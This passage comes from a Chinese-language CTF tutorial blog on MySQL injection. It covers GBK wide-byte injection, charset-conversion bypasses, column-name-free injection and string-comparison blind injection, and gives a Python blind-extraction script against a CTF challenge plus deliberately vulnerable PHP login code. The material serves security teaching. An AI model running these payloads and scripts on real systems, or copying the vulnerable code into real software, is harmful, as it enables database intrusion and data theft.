addslashes(@$_POST&#91;'password']);<\/code><\/pre>\n\n\n\n<p>\u9996\u5148\u8fd9\u91cc\u7684\u7f16\u7801\u88ab\u8bbe\u7f6e\u4e3a\u4e86gbk\uff0c\u5176\u6b21\u6211\u4eec\u4f7f\u7528\u4e86<code>addslashes<\/code>\u51fd\u6570\uff0c\u8fd9\u4e2a\u51fd\u6570\u4f1a\u5c06\u628aPOST\u63a5\u6536\u5230\u7684username\u4e0epassword\u7684\u90e8\u5206\u5b57\u7b26\u8fdb\u884c\u8f6c\u4e49\u5904\u7406\uff0c\u4f5c\u7528\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5b57\u7b26<code>'\u3001\"\u3001\\<\/code>\u524d\u8fb9\u4f1a\u88ab\u6dfb\u52a0\u4e0a\u4e00\u6761\u53cd\u659c\u6760<code>\\<\/code>\u4f5c\u4e3a\u8f6c\u4e49\u5b57\u7b26\u3002 <\/li>\n\n\n\n<li>\u591a\u4e2a\u7a7a\u683c\u88ab\u8fc7\u6ee4\u6210\u4e00\u4e2a\u7a7a\u683c<\/li>\n<\/ul>\n\n\n\n<p>\u5982\u679c\u6211\u4eec\u8f93\u5165username=%df%27or%201=1%23&amp;password=123\uff0c\u7ecf\u8fc7addslashes\u51fd\u6570\u7684\u8f6c\u4e49\uff0c\u6700\u540e\u63a5\u6536\u5230\u7684payload\u4e3a(\u201c\\\u201d\u7684url\u7f16\u7801\u5c31\u662f%5c)\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>username=%df%5c%27or%201=1%23&amp;password=123<\/code><\/pre>\n\n\n\n<p>\u7ecf\u8fc7gbk\u89e3\u7801\u5f97\u5230\uff1a<code>username=\u904b'or 1=1#<\/code>\u3001<code>password=123<\/code>\uff0c\u62fc\u63a5\u5230SQL\u8bed\u53e5\u5f97\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from users where username = '\u904b'or 1=1#' and password='123';<\/code><\/pre>\n\n\n\n<p>\u6700\u540e\u5373\u53ef\u6210\u529f\u541e\u6389\\\u6210\u529f\u9003\u9038\u5355\u5f15\u53f7\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u9632\u8303\u65b9\u6cd5<\/h3>\n\n\n\n<p>\u5148\u8c03\u7528mysql_set_charset\u51fd\u6570\u8bbe\u7f6e\u8fde\u63a5\u4f7f\u7528\u7684\u5b57\u7b26\u96c6\u4e3agbk\uff0c\u518d\u8c03\u7528mysql_real_escape_string\u51fd\u6570\u5bf9\u7528\u6237\u7684\u8f93\u5165\u8fdb\u884c\u8f6c\u4e49(\u8be5\u51fd\u6570\u6bd4addslashes\u51fd\u6570\u5b89\u5168)\u3002\u8fd9\u6837\u5f53\u7528\u6237\u8f93\u5165%df&#8217; \u5373 %df%5c \u65f6 mysql \u5c31\u4f1a\u628a\u4ed6\u76f4\u63a5\u7f16\u7801\u4e3a \u904b \uff0cmysql_real_escape_string\u51fd\u6570\u662f\u4e0d\u4f1a\u5bf9%5c\u518d\u6dfb\u52a0%5c\u8fdb\u884c\u8f6c\u4e49\u7684\uff0c\u8fd9\u6837\u5c31\u9884\u9632\u4f4f\u5bbd\u5b57\u8282\u6ce8\u5165\u4e86<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Mysql\u7f16\u7801\u8f6c\u6362<\/h2>\n\n\n\n<p>\u7f51\u7ad9\u6e90\u7801\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$mysqli = new mysqli(\"localhost\", \"root\", \"root\", \"cat\");\n\nif ($mysqli-&gt;connect_errno) {\n    printf(\"Connect failed: %s\\n\", $mysqli-&gt;connect_error);\n    exit();\n}\n\n$mysqli-&gt;query(\"set names utf8\");\n\n$username = addslashes($_GET&#91;'username']);\n\nif($username === 'admin'){\n    die(\"You can't do this.\");\n}\n\n$sql = \"SELECT * FROM `table1` WHERE username='{$username}'\";\n\nif ($result = $mysqli-&gt;query( $sql )) {\n    printf(\"Select returned %d rows.\\n\", $result-&gt;num_rows);\n\n    while ($row = $result-&gt;fetch_array(MYSQLI_ASSOC))\n    {\n        var_dump($row);\n    }\n\n    $result-&gt;close();\n} else {\n    var_dump($mysqli-&gt;error);\n}\n\n$mysqli-&gt;close();\n?&gt;<\/code><\/pre>\n\n\n\n<p>\u5efa\u8868\u8bed\u53e5\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>CREATE TABLE `table1` (\n  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,\n  `username` varchar(255) COLLATE latin1_general_ci NOT NULL,\n  `password` varchar(255) COLLATE latin1_general_ci NOT NULL,\n  PRIMARY KEY (`id`)\n) ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci;<\/code><\/pre>\n\n\n\n<p>\u4e8b\u5b9e\u4e0a\u5373\u4f7f\u6211\u4eec\u4e0d\u8bbe\u7f6e\u7f16\u7801\u4e3alatin1\uff0c\u9ed8\u8ba4\u7f16\u7801\u4e5f\u662flatin1\u3002<\/p>\n\n\n\n<p>\u5982\u679c\u6211\u4eec\u60f3\u8981\u4f7f\u7528<code>insert table1 VALUES(1,'admin','admin');<\/code>\u63d2\u5165\u4e00\u6761\u6570\u636e\uff0c\u7531\u4e8e\u5bf9\u4e8eadmin\u7684\u5224\u65ad\u6211\u4eec\u662f\u4e0d\u80fd\u6210\u529f\u6267\u884c\u7684<code>\u3002<\/code><\/p>\n\n\n\n<p>\u5bf9\u4e8esql\u800c\u8a00\uff0cset names utf8;\u76f8\u5f53\u4e8e\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt;SET character_set_client ='utf8';\nmysql&gt;SET character_set_results ='utf8';\nmysql&gt;SET character_set_connection ='utf8';<\/code><\/pre>\n\n\n\n<p>SQL\u8bed\u53e5\u4f1a\u5148\u8f6c\u6210<code>character_set_client<\/code>\u8bbe\u7f6e\u7684\u7f16\u7801\uff0c\u7136\u540e\u5b83\u8fd8\u4f1a\u7ee7\u7eed\u8f6c\u5316\uff0c<code>character_set_client<\/code>\u5ba2\u6237\u7aef\u5c42\u8f6c\u6362\u5b8c\u6bd5\u4e4b\u540e\uff0c\u6570\u636e\u5c06\u4f1a\u4ea4\u7ed9<code>character_set_connection<\/code>\u8fde\u63a5\u5c42\u5904\u7406\uff0c\u6700\u540e\u5728\u4ece<code>character_set_connection<\/code>\u8f6c\u5230\u6570\u636e\u8868\u7684\u5185\u90e8\u64cd\u4f5c\u5b57\u7b26\u96c6\uff0c\u5c31\u8fd9\u4e2a\u4f8b\u5b50\u800c\u8a00\uff0c\u987a\u5e8f\u4e3a\uff1a<code>UTF-8\u2014&gt;UTF-8-&gt;Latin1<\/code><\/p>\n\n\n\n<p>\u7531\u4e8e\u7f16\u7801\u7279\u6027\uff0c\u6211\u4eec\u5728\u8fd9\u91cc\u53ef\u4ee5\u8f93\u5165<code>?username=admin%c2<\/code>\uff0c<code>%c2<\/code>\u662f\u4e00\u4e2aLatin1\u5b57\u7b26\u96c6\u4e0d\u5b58\u5728\u7684\u5b57\u7b26\u3002\u5bf9\u4e8eUTF\u7f16\u7801\u800c\u8a00\uff0c%00-%7F\u53ef\u4ee5\u76f4\u63a5\u8868\u793a\u67d0\u4e2a\u5b57\u7b26\uff0c%C2-%F4\u4e0d\u53ef\u4ee5\u76f4\u63a5\u8868\u793a\u67d0\u4e2a\u5b57\u7b26\uff0c\u4ed6\u4eec\u53ea\u662f\u5176\u4ed6\u957f\u5b57\u8282\u7f16\u7801\u7ed3\u679c\u7684\u9996\u5b57\u8282\u3002\u8fd9\u91cc\u8fd8\u6709\u4e00\u4e2a\u70b9\uff0c\u90a3\u5c31\u662fMysql\u6240\u4f7f\u7528\u7684UTF-8\u7f16\u7801\u662f\u9609\u5272\u7248\u7684\uff0c\u4ec5\u652f\u6301\u4e09\u4e2a\u5b57\u8282\u7684\u7f16\u7801\uff0c\u56e0\u6b64Mysql\u91cc\u9996\u5b57\u8282\u8303\u56f4\u4e3a\uff1a<code>00-7F\u3001C2-EF<\/code>\uff0c\u5bf9\u4e8e\u4e0d\u5b8c\u6574\u7684\u957f\u5b57\u8282UTF-8\u7f16\u7801\u7684\u5b57\u7b26\uff0c\u82e5\u8fdb\u884c\u5b57\u7b26\u96c6\u8f6c\u6362\u65f6\uff0c\u4f1a\u76f4\u63a5\u8fdb\u884c\u5ffd\u7565\u5904\u7406\u3002<\/p>\n\n\n\n<p>\u6240\u4ee5\u5728\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u8f93\u5165payload\uff1a<code>?username=admin%c2<\/code>\uff0c\u6b64\u5904\u7684<code>%c2<\/code>\u6362\u4e3a<code>%c2-%ef<\/code>\u5747\u53ef\uff0c\u6700\u540e\u63a5\u6536\u5230\u7684payload\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT * FROM `table1` WHERE username='admin'<\/code><\/pre>\n\n\n\n<p>\u56e0\u4e3a\u6700\u540e\u6267\u884c\u6bd4\u8f83<code>username='admin'<\/code>\u7684\u65f6\u5019\uff0c<code>'admin'<\/code>\u662f\u4e00\u4e2alatin1\u5b57\u7b26\u4e32\uff0c\u800cMysql\u5728\u6700\u540e\u8fdb\u884c\u4ece<code>UTF-8-&gt;Latin1<\/code>\u8fdb\u884c\u7f16\u7801\u8f6c\u6362\u65f6\uff0c\u5c31\u5c06\u4e0d\u5b8c\u6574\u7684\u5b57\u7b26\u7f16\u7801<code>%c2<\/code>\u5ffd\u7565\u4e86(<code>%c2-%ef<\/code>\u5747\u662f\u4e0d\u5b8c\u6574\u7f16\u7801)\u3002<\/p>\n\n\n\n<p>\u5177\u4f53\u53ef\u4ee5\u53c2\u8003p\u795e\u5199\u7684<a href=\"https:\/\/www.leavesongs.com\/PENETRATION\/mysql-charset-trick.html\">Mysql\u5b57\u7b26\u7f16\u7801\u5229\u7528\u6280\u5de7<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u65e0\u5217\u540d\u6ce8\u5165<\/h1>\n\n\n\n<p>\u65e0\u5217\u540d\u6ce8\u5165\uff0c\u5373\u5728\u4e0d\u77e5\u9053\u5217\u540d\u7684\u60c5\u51b5\u4e0b\u8fdb\u884c sql \u6ce8\u5165\u3002\u6709\u65f6\u5019CTF\u91cc\u4f1a\u628ainformation_schema\u8fc7\u6ee4\u4e86\uff0c\u8ba9\u6211\u4eec\u53ea\u80fd\u60f3\u5176\u4ed6\u65b9\u6cd5\u83b7\u53d6\u8868\u540d\uff0c\u53c2\u8003<a href=\"https:\/\/www.cnblogs.com\/phant0m\/articles\/16450646.html\">\u65e0\u5217\u540d\u6ce8\u5165\u59ff\u52bf\u603b\u7ed3<\/a>\uff0c\u8fd9\u65f6\u6211\u4eec\u53ef\u4ee5\u5148\u5229\u7528\u5176\u4ed6\u5e93\u6216\u8005\u89c6\u56fe\u67e5\u8868\u540d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql\uff1a\nmysql.innodb_table_stats\nmysql.innodb_index_stats\n\n\nsys\uff1a\nx$schema_table_statistics_with_buffer\nschema_table_statistics_with_buffer\n\n\u89c6\u56fe\uff1a\nschema_auto_increment_columns<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>select group_concat(table_name) from |mysql.innodb_table_stats|x$schema_table_statistics_with_buffer|schema_auto_increment_columns|<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u518d\u60f3\u529e\u6cd5\u65e0\u5217\u540d\u6ce8\u5165<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">union\u53d6\u522b\u540d<\/h2>\n\n\n\n<p>\u6bd4\u5982\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528select 1,2 union select * from sheet1\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-16.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"564\" height=\"328\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-16.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1437\"  sizes=\"auto, (max-width: 564px) 100vw, 564px\" \/><\/div><\/figure>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u5217\u540d\u76f4\u63a5\u53d8\u62101\uff0c2\u4e86\uff0c\u7136\u540e\u6211\u4eec\u5c31\u53ef\u4ee5\u7528\u8fd9\u4e2a\u522b\u540d\u8fdb\u884csql\u67e5\u8be2\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select `2` from (select 1,2 union select * from sheet1)a;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-17.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"617\" height=\"313\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-17.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1438\"  sizes=\"auto, (max-width: 617px) 100vw, 617px\" \/><\/div><\/figure>\n\n\n\n<p>\u6ce8\u610f\uff0c\u8fd9\u4e2a1\u662f\u5fc5\u987b\u52a0&#8220;\u7684\uff0c\u5176\u6b21from\u540e\u9762\u7684\u8bed\u53e5\u662f\u4e00\u4e2a\u6574\u4f53\uff0c\u6240\u4ee5\u8981\u7528\u62ec\u53f7\u62ec\u8d77\u6765\uff0c\u800c\u540e\u9762\u90a3\u4e2aa\uff0c\u76f8\u5f53\u4e8e\u662f\u62ec\u53f7\u91cc\u8bed\u53e5\u7684\u522b\u540d\u76f8\u5f53\u4e8e as a,\u53ef\u4ee5\u968f\u4fbf\u8d77\u540d;<\/p>\n\n\n\n<p>\u6709\u65f6\u5019&#8220;\u4f1a\u88abban\u6389\uff0c\u6211\u4eec\u53ef\u4ee5\u7ee7\u7eed\u53d6\u522b\u540d\u6765\u67e5\u8be2\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select GROUP_CONCAT(c) from (select 1 as b,2 as c union select * from sheet1)a<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-18.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"730\" height=\"260\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-18.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1439\"  sizes=\"auto, (max-width: 730px) 100vw, 730px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\u5229\u7528join\u7206\u5217\u540d<\/h2>\n\n\n\n<p>\u5728\u524d\u9762\u62a5\u9519\u6ce8\u5165\u91cc\u7684mysql\u5217\u540d\u91cd\u590d\u62a5\u9519\u63d0\u5230\u8fc7\u4e86\uff0c\u4e0d\u8fc7\u8fd9\u79cd\u6280\u5de7\u9700\u8981\u5f00\u542f\u62a5\u9519\u624d\u884c\uff0c\u672c\u8d28\u662f\u62a5\u9519\u6ce8\u5165\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5b57\u7b26\u6bd4\u8f83\u76f2\u6ce8<\/h2>\n\n\n\n<p>\u5728sql\u91cc\uff0c\u4e24\u4e2a\u5b57\u7b26\u4e32\u7684\u5927\u5c0f\u4e0e\u5b57\u7b26\u4e32\u7684\u957f\u5ea6\u662f\u6ca1\u6709\u5173\u7cfb\u7684\uff0c\u7ed9\u5b9a\u4e24\u4e2a\u5b57\u7b26\u4e32\uff0c\u4f1a\u5404\u53d6\u4e24\u4e2a\u5b57\u7b26\u4e32\u7684\u9996\u5b57\u7b26ascii\u7801\u6765\u6bd4\u8f83\uff0c\u4e0d\u7b49\u5f0f\u6210\u7acb\u8fd4\u56de1\uff0c\u4e0d\u7b49\u5f0f\u4e0d\u6210\u7acb\u8fd4\u56de0\u3002<\/p>\n\n\n\n<p>\u8fd9\u91cc\u5c31ascii\u7801\u800c\u8a00\uff0cg&gt;f\u6240\u4ee5\u8fd4\u56de1<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-19.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"588\" height=\"254\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-19.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1447\"  sizes=\"auto, (max-width: 588px) 100vw, 588px\" \/><\/div><\/figure>\n\n\n\n<p>\u5982\u679c\u76f8\u7b49\u6216\u8005\u5c0f\u4e8e\u5219\u8fd4\u56de\u96f6\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-20.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"454\" height=\"244\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-20.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1448\"  sizes=\"auto, (max-width: 454px) 100vw, 454px\" \/><\/div><\/figure>\n\n\n\n<p>\u5229\u7528\u8fd9\u4e2a\u7279\u6027\uff0c\u5c31\u53ef\u4ee5\u9010\u5b57\u7b26\u7206\u7834\u6570\u636e\uff0c\u5f53\u7136\uff0c\u5982\u679c\u56e0\u4e3a\u5728\u76f8\u7b49\u65f6\u8fd4\u56de<strong>0<\/strong>\uff0c\u6240\u4ee5\u5728\u8fdb\u884c\u7206\u7834\u65f6\uff0c\u6211\u4eec\u7206\u7834\u51fa\u6765\u7684<strong>1<\/strong>\u7684\u65f6\u5019\uff0c\u662f\u6bd4\u6b63\u786e\u5b57\u7b26\u8981\u59271\u7684\uff0c\u6240\u4ee5\u5728\u7f16\u5199\u811a\u672c\u65f6\uff0c\u6211\u4eec\u8981<strong>-1<\/strong>\u624d\u80fd\u5f97\u5230\u6b63\u786e\u5b57\u7b26\u3002<\/p>\n\n\n\n<p>\u4ee5<a href=\"https:\/\/blog.csdn.net\/weixin_45646006\/article\/details\/120073020\">[GYCTF2020]Ezsqli<\/a>\u8fd9\u9053\u9898\u4e3a\u4f8b\uff0c\u8fd9\u4e2a\u9898\u6211\u4eec\u53ef\u4ee5\u5148\u7528sys.schema_table_statistics_with_buffer\u6216sys.x$schema_table_statistics_with_buffer\u4ee3\u66ffinformation_schema.tables\uff0c\u83b7\u5f97\u5217\u540df1ag_1s_h3r3_hhhhh\uff0c\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5224\u65ad\u5b57\u6bb5\u6570\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8f93\u5165<code>2||((select 1,1)&gt;(select * from f1ag_1s_h3r3_hhhhh))<\/code>\uff0c\u53d1\u73b0\u7f51\u9875\u8f93\u51fa<code>Nu1L<\/code><\/li>\n\n\n\n<li>\u8f93\u5165<code>2||((select 1,1,1)&gt;(select * from f1ag_1s_h3r3_hhhhh))<\/code>\uff0c\u53d1\u73b0\u7f51\u9875\u8f93\u51fa<code>bool(false)<\/code><\/li>\n<\/ul>\n\n\n\n<p>\u56e0\u6b64\u53ea\u6709\u4e24\u4e2a\u5217\uff0c\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5206\u5f00\u6ce8\u5165\u4e24\u4e2a\u5217\u7684\u503c\uff0c\u7ed9\u4e00\u4e2a\u811a\u672c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport time\nOriginal_url = \"http:\/\/e78d520e-a527-4dc7-9262-5997951db6c3.node4.buuoj.cn:81\/index.php\"\nSuccess_message = &#91;\"Nu1L\",\"V&amp;N\"]\ndata = {\"id\": \"\"}\ntable_name_payload = \"2||(select ascii(substr(group_concat(table_name),{},1)) from sys.x$schema_table_statistics_with_buffer where table_schema=database())&gt;{}\"\ncolumn_1_payload = '2||((select \"{}\",1)&gt;(select * from {}))'\ncolumn_2_payload = '2||((select 1,\"{}\")&gt;(select * from {}))'\n\ndef getname(payload):\n    name = ''\n    for i in range(1, 100):\n        begin = 32\n        end = 126\n        mid = (begin + end) \/\/ 2\n        while begin &lt; end:\n            data&#91;\"id\"] = payload.format(i,mid)\n            RowText = requests.post(Original_url, data=data)\n            if Success_message&#91;0] in RowText.text:\n                begin = mid + 1\n            else:\n                end = mid\n            mid = (begin + end) \/\/ 2\n        if (mid == 32):\n            print()\n            break\n        name += chr(mid)\n        print(\"\\r\u8868\u540d: \" + name, end=\"\")\n\ndef GetData(table_name, column_payload):\n    flag = ''\n    for i in range(1, 100): #\u6570\u636e\u7684\u7b2ci\u4f4d\n        time.sleep(0.3) #\u6682\u505c\n        begin = 32\n        end = 126\n        mid = (begin + end) \/\/ 2 #\u53d6\u6574\u9664\uff0c\u8fd4\u56de\u5546\u7684\u6574\u6570\u90e8\u5206\uff08\u5411\u4e0b\u53d6\u6574\uff09\n        while begin &lt; end:\n            tmp = flag + chr(mid)\n            data&#91;\"id\"] = column_payload.format(tmp, table_name)\n            RowText = requests.post(Original_url, data=data)\n            if Success_message&#91;1] in RowText.text: # \u8fd9\u91cc\u7528V&amp;N\u5224\u65ad\n                begin = mid + 1\n            else:\n                end = mid\n            mid = (begin + end) \/\/ 2\n        if (mid == 33):\n            print()\n            break\n        flag += chr(mid - 1)\n        print((\"\\r\u8868%s\u7684\u6570\u636e: \" + flag.lower()) % (table_name), end=\"\")\n\ngetname(table_name_payload)\nGetData(\"f1ag_1s_h3r3_hhhhh\", column_1_payload)\nGetData(\"f1ag_1s_h3r3_hhhhh\", column_2_payload)<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u662f\u7528\u7684((select 1,&#8221;{}&#8221;)&gt;(select * from f1ag_1s_h3r3_hhhhh))\uff0c\u901a\u8fc7\u4e00\u4f4d\u4e00\u4f4d\u7684\u589e\u52a0\u786e\u5b9a\u54ea\u4e2a\u5b57\u7b26\u662f\u6b63\u786e\u7684\uff0c\u8fd9\u4e2apayload\u7684\u610f\u601d\u5c31\u662ff1ag_1s_h3r3_hhhhh\u7b2c\u4e8c\u4e2a\u5b57\u6bb5\u7684\u6570\u636e\u6bcf\u4e00\u4e2a\u5b57\u7b26\u4e0eF\u8fd9\u4e2a\u5b57\u7b26\u4e32\u6bcf\u9694\u4e00\u4e2a\u5b57\u7b26\u6bd4\u8f83\u5927\u5c0f\uff0c\u5982\u679cF\u6bd4\u8f83\u5927\uff0c\u5c31\u8fd4\u56deTrue\uff0c\u90a3\u4e2a1\u5c31\u662f\u7528\u6765\u5360\u4f4d\u7684\uff0c\u4ee5\u6b64\u7c7b\u63a8\uff0c\u4e0d\u65ad\u589e\u52a0\u5b57\u7b26\u4e32\u957f\u5ea6\uff0c\u5c31\u53ef\u4ee5\u5f97\u5230\u5b8c\u6574\u7684\u6570\u636e\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ea6\u675f\u653b\u51fb<\/h1>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u7528\u6211\u6284\u7684\u4f8b\u5b50\u6765\u8bba\u8ff0\u8fd9\u79cd\u653b\u51fb\u65b9\u5f0f\uff0c\u6211\u4eec\u5148\u521b\u4e00\u4e2a\u8868\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>CREATE TABLE users(\n    username varchar(20),\n    password varchar(20)\n)<\/code><\/pre>\n\n\n\n<p>\u6ce8\u518c\u5224\u65ad\u4ee3\u7801\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$conn = mysqli_connect(\"127.0.0.1:3307\", \"root\", \"root\", \"db\");\nif (!$conn) {\n    die(\"Connection failed: \" . mysqli_connect_error());\n}\n$username = addslashes(@$_POST&#91;'username']);\n$password = addslashes(@$_POST&#91;'password']);\n$sql = \"select * from users where username = '$username'\";\n$rs = mysqli_query($conn,$sql);\nif($rs-&gt;fetch_row()){\n    die('\u8d26\u53f7\u5df2\u6ce8\u518c');\n}else{\n    $sql2 = \"insert into users values('$username','$password')\";\n    mysqli_query($conn,$sql2);\n    die('\u6ce8\u518c\u6210\u529f');\n}\n?&gt;<\/code><\/pre>\n\n\n\n<p>\u767b\u5f55\u5224\u65ad\u4ee3\u7801\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$conn = mysqli_connect(\"127.0.0.1:3307\", \"root\", \"root\", \"db\");\nif (!$conn) {\n    die(\"Connection failed: \" . mysqli_connect_error());\n}\n$username = addslashes(@$_POST&#91;'username']);\n$password = addslashes(@$_POST&#91;'password']);\n$sql = \"select * from users where username = '$username' and password='$password';\";\n$rs = mysqli_query($conn,$sql);\nif($rs-&gt;fetch_row()){\n    $_SESSION&#91;'username']=$password;\n}else{\n    echo 